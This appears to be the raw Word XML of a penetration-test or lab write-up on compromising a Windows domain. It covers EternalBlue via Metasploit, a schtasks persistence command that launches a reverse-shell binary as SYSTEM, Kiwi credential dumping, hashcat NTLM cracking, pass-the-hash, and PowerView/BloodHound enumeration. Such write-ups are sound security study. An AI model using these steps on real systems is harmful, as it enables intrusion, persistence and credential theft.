        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="221"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pP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smb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>port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open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerable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eternal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>blue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accessed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windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>machine as NT AUTHORITY\SYSTEM using msfconsole to exploit it.</w:t>
      </w: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802130"/>
                <wp:effectExtent l="0" t="0" r="0" b="7619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943600" cy="1802130"/>
                          <a:chExt cx="5943600" cy="1802130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48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5760"/>
                            <a:ext cx="5941695" cy="5157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141.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" id="docshapegroup53" coordorigin="0,0" coordsize="9360,2838">
                <v:shape style="position:absolute;left:0;top:0;width:9360;height:1966" type="#_x0000_t75" id="docshape54" stroked="false">
                  <v:imagedata r:id="rId30" o:title=""/>
                </v:shape>
                <v:shape style="position:absolute;left:0;top:2024;width:9357;height:813" type="#_x0000_t75" id="docshape55" stroked="false">
                  <v:imagedata r:id="rId3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3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892492</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>267419</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5987415" cy="314325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5987415" cy="3143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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>schtasks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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>/create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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>/tn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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>updater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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>/tr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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>"C:\Users\hp\rev.exe"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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>/sc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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>onstart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FF00"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>/ru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FF00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>SYSTEM</w:t>
                            </w:r>
                          </w:p>
                          <w:p>
                            <w:pPr>
                              <w:spacing w:before="18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FF00"/>
                                <w:spacing w:val="-5"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>/f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75002pt;margin-top:21.056641pt;width:471.45pt;height:24.75pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15720960;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" id="docshape56" filled="true" fillcolor="#1e1e1e" stroked="false">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:line="225" w:lineRule="exact" w:before="0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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>schtasks</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>/create</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>/tn</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>updater</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>/tr</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>"C:\Users\hp\rev.exe"</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>/sc</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>onstart</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>/ru</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>SYSTEM</w:t>
                      </w:r>
                    </w:p>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:before="18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FF00"/>
                          <w:spacing w:val="-5"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>/f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Windows-Scheduled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Persistence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="62"/>
        <w:ind w:left="720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scheduled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>running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start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privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ensures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>re-access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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reboot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="14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128937</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5964163" cy="609790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163" cy="60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7"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Dumping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Kiwi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="216"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access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Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7,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Kiwi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>extension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loaded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dump all credentials without touching disk.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1371600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>99104</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4076065" cy="2400300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2240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cracking:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="10114" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="218"/>
        <w:ind w:left="715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FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>hashes.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:i w:val="0"/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:i w:val="0"/>
          <w:sz w:val="4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1953260</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>50689</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3829050" cy="457200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4"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Pass-the-Hash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/>
        <w:t>Lateral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> Movement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="222"/>
        <w:ind w:left="720" w:right="1500" w:firstLine="720"/>
      </w:pP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recovered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hashes,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>pass-the-hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>performed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to authenticate without plaintext passwords.</w:t>
      </w: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124302</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5888665" cy="123063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665" cy="123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962660</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>347663</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5801824" cy="2009775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824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0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="167"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>RDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Access:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9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137622</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5712212" cy="741997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212" cy="741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1004015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5695011" cy="216884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011" cy="216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pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19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02610" cy="3000755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2610" cy="30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line="384" w:lineRule="auto" w:before="195"/>
        <w:ind w:right="5814"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Reaching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Status Active Directory Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="6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7415" cy="603250"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"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5987415" cy="60325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369" w:lineRule="auto" w:before="3"/>
                              <w:ind w:left="30" w:right="7596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FF00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>Get-NetUser Get-NetComputer</w:t>
                            </w:r>
                          </w:p>
                          <w:p>
                            <w:pPr>
                              <w:spacing w:before="2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FF00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>Get-NetGroup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1.45pt;height:47.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" id="docshape57" filled="true" fillcolor="#1e1e1e" stroked="false">
                <w10:anchorlock/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:line="369" w:lineRule="auto" w:before="3"/>
                        <w:ind w:left="30" w:right="7596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FF00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>Get-NetUser Get-NetComputer</w:t>
                      </w:r>
                    </w:p>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:before="2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FF00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>Get-NetGroup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1438910</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>136096</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4783483" cy="3081813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483" cy="3081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440" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="15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30685" cy="3626167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685" cy="362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1829435</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>155829</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4018359" cy="3950017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8359" cy="395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top="1440" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="221"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>BloodHound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powerful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>graph-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>visualization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tool.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>uses SharpHound as a data collection agent that queries LDAP and SMB to gather object relationships across the domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="153" w:after="0"/>
        <w:ind w:left="1441" w:right="1282" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SharpHound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was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executed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appropriate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collection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methods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(All,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DCOnly)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harvest comprehensive domain data.</w:t>
      </w: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97" w:lineRule="exact" w:before="0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collected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JSON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data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was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imported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BloodHound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GUI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visualization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="9" w:after="0"/>
        <w:ind w:left="1441" w:right="1245" w:hanging="360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'Shortest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Domain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Admin'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query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revealed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multiple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viable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privilege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escalation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1441" w:right="2401" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pre-built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attack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path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queries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were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used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identify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users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DCSync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rights, unconstrained delegation, and ACL abuse opportunities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="249" w:lineRule="auto" w:before="54"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr/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452458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5914737" cy="2055876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737" cy="205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BloodHound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>significantly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reduces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time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>identify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>complex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>paths</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that would otherwise take hours of manual analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="209"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
